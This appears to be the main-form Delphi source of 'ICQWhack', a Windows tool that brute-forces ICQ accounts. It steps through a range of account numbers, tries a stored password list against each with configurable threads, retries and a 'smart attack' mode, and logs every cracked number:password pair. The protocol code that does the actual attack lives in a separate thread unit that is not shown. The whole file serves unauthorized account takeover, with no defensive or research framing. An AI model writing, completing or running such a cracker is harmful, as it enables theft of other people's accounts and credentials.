unit Main;

interface

uses
  SysUtils, Classes, Forms, Controls,
  StdCtrls, Registry, ComCtrls, Windows,
  Options, Spin, ICQThread, ExtCtrls;

type
  TMainForm = class(TForm)
    Box1: TGroupBox;
    LogMemo: TMemo;
    GroupBox1: TGroupBox;
    SuccMemo: TMemo;
    GroupBox2: TGroupBox;
    Label1: TLabel;
    Label2: TLabel;
    GoBtn: TButton;
    OptBtn: TButton;
    Label3: TLabel;
    Label4: TLabel;
    AtkProgress: TProgressBar;
    StartEdit: TSpinEdit;
    EndEdit: TSpinEdit;
    CurrentEdit: TSpinEdit;
    Label5: TLabel;
    ClearBtn: TButton;
    Bevel1: TBevel;
    procedure FormCreate(Sender: TObject);
    procedure FormDestroy(Sender: TObject);
    procedure OnSuccess(UIN: LongWord; PASS: String);
    procedure OnStatus(StatStr: String; StatNo: Integer; UIN: LongWord; Pass: String; LPort: Integer; Thread: Byte);
    procedure OnError(ErrorStr: String; ErrorNo: Integer);
    procedure GoBtnClick(Sender: TObject);
    procedure OptBtnClick(Sender: TObject);
    procedure ReadOpt;
    procedure SaveOpt;
    procedure StartEditChange(Sender: TObject);
    procedure ResetProgressBar;
    procedure ClearBtnClick(Sender: TObject);
  private
    { Private declarations }
    IRunning: Boolean;
    ITimeout: Word;
    IAckTimeout: Word;
    ILogOff: Boolean;
    ISmart: Boolean;
    IStart: LongWord;
    ICurrent: LongWord;
    IEnd: LongWord;
    IPasswords: String;
    IThreads: Word;
    IRetries: Byte;
  public
    { Public declarations }
  end;

const
  ICQ_MAX_BUF = 450;
  RegPath = '\Software\Coban\ICQWhack';

var
  MainForm: TMainForm;
  IObj: TICQThread;

implementation
{$R *.DFM}

procedure TMainForm.OnSuccess(UIN: LongWord; PASS: String);
begin
  SuccMemo.Lines.Add(IntToStr(UIN) + ':' + PASS);
end;

procedure TMainForm.OnStatus(StatStr: String; StatNo: Integer; UIN: LongWord; Pass: String; LPort: Integer; Thread: Byte);
begin
  LogMemo.Lines.Add('['+TimeToStr(Time)+'] ('+IntToStr(UIN)+';'+Pass+';'+IntToStr(LPort)+'{'+IntToStr(Thread)+'}'+') '+StatStr);
  case StatNo of
    $03E8: //login packet
    begin
        CurrentEdit.Text := IntToStr(UIN);
        if UIN > ICurrent  then
          ICurrent := UIN;
        ResetProgressBar;
    end;
    $FFFF: //ready (end of full hack)
    begin
      GoBtn.Caption := 'Go!';
    end;
  end;
end;

procedure TMainForm.OnError(ErrorStr: String; ErrorNo: Integer);
begin
  LogMemo.Lines.Add('['+TimeToStr(Time)+'] Warning! ' + ErrorStr);
end;

procedure TMainForm.GoBtnClick(Sender: TObject);
begin
  ReadOpt;                                                        //read options from registry
  if IPasswords = '' then
  begin
    MessageBox(Handle, PChar('Password list is empty!'), PChar('Error!'), MB_OK or MB_ICONERROR);
    Exit;
  end;
  if IRunning then
    IObj.Free;                                                    //free ICQ Object
  IEnd := StrToInt(EndEdit.Text);                                 //end of range
  IStart := StrToInt(StartEdit.Text);                             //start range
  ICurrent := StrToInt(CurrentEdit.Text);                         //current range value
  if GoBtn.Caption <> 'Stop' then
  begin
    IRunning := True;
    GoBtn.Caption := 'Stop';
    IObj := TICQThread.Create(ICurrent, IEnd, IPasswords, IThreads, ITimeout, ILogOff, ISmart, IAckTimeout, IRetries); //object initialization
    IObj.OnSuccess := OnSuccess;
    IObj.OnStatus := OnStatus;
    IObj.OnError := OnError;
    IObj.StartAtk;                                                //GO!
  end
  else
  begin
    GoBtn.Caption := 'Go!';
    IRunning := False;
  end;
end;

procedure TMainForm.ReadOpt;
var
  Reg: TRegistry;
begin
  IStart := 0;
  IEnd := 0;
  ICurrent := 0;
  IPasswords := '';
  IThreads := 1;
  IRetries := 1;
  Reg := TRegistry.Create;
  try
    if Reg.OpenKey(RegPath, True) then
    begin
      if Reg.ValueExists('UINStart') then
        IStart := Reg.ReadInteger('UINStart');
      if Reg.ValueExists('UINEnd') then
        IEnd := Reg.ReadInteger('UINEnd');
      if Reg.ValueExists('UINCurrent') then
        ICurrent := Reg.ReadInteger('UINCurrent');
      if Reg.ValueExists('Timeout') then
        ITimeout := Reg.ReadInteger('Timeout');
      if Reg.ValueExists('PasswordList') then
        IPasswords := Reg.ReadString('PasswordList');
      if Reg.ValueExists('AckTimeout') then
        IAckTimeout := Reg.ReadInteger('AckTimeout');
      if Reg.ValueExists('SmartAtk') then
        ISmart := Reg.ReadBool('SmartAtk');
      if Reg.ValueExists('SendLogOff') then
        ILogOff := Reg.ReadBool('SendLogOff');
      if Reg.ValueExists('ThreadNum') then
        IThreads := Reg.ReadInteger('ThreadNum');
      if Reg.ValueExists('Retries') then
        IRetries := Reg.ReadInteger('Retries');
    end;
  finally
    Reg.CloseKey;
    Reg.Free;
  end;
  ResetProgressBar;
end;

procedure TMainForm.SaveOpt;
var
  Reg: TRegistry;
begin
  Reg := TRegistry.Create;
  try
    if Reg.OpenKey(RegPath, True) then
    begin
      Reg.WriteInteger('UINStart', IStart);
      Reg.WriteInteger('UINEnd', IEnd);
      Reg.WriteInteger('UINCurrent', ICurrent);
    end;
  finally
    Reg.CloseKey;
    Reg.Free;
  end;
end;

procedure TMainForm.ResetProgressBar;
begin
  if (IEnd - IStart) <> 0 then
    AtkProgress.Position := (100 * (ICurrent - IStart)) div (IEnd - IStart);
end;

procedure TMainForm.FormCreate(Sender: TObject);
begin
  IRunning := False;
  ReadOpt;
  StartEdit.Text := IntToStr(IStart);
  EndEdit.Text := IntToStr(IEnd);
  CurrentEdit.Text := IntToStr(ICurrent);
  Randomize;
end;

procedure TMainForm.FormDestroy(Sender: TObject);
begin
  SaveOpt;
  if IRunning then
    IObj.Free;
end;

procedure TMainForm.OptBtnClick(Sender: TObject);
begin
  OptForm.Show;
end;

procedure TMainForm.StartEditChange(Sender: TObject);
begin
  CurrentEdit.Text := StartEdit.Text;
end;

procedure TMainForm.ClearBtnClick(Sender: TObject);
begin
  LogMemo.Lines.Clear;
end;
end.
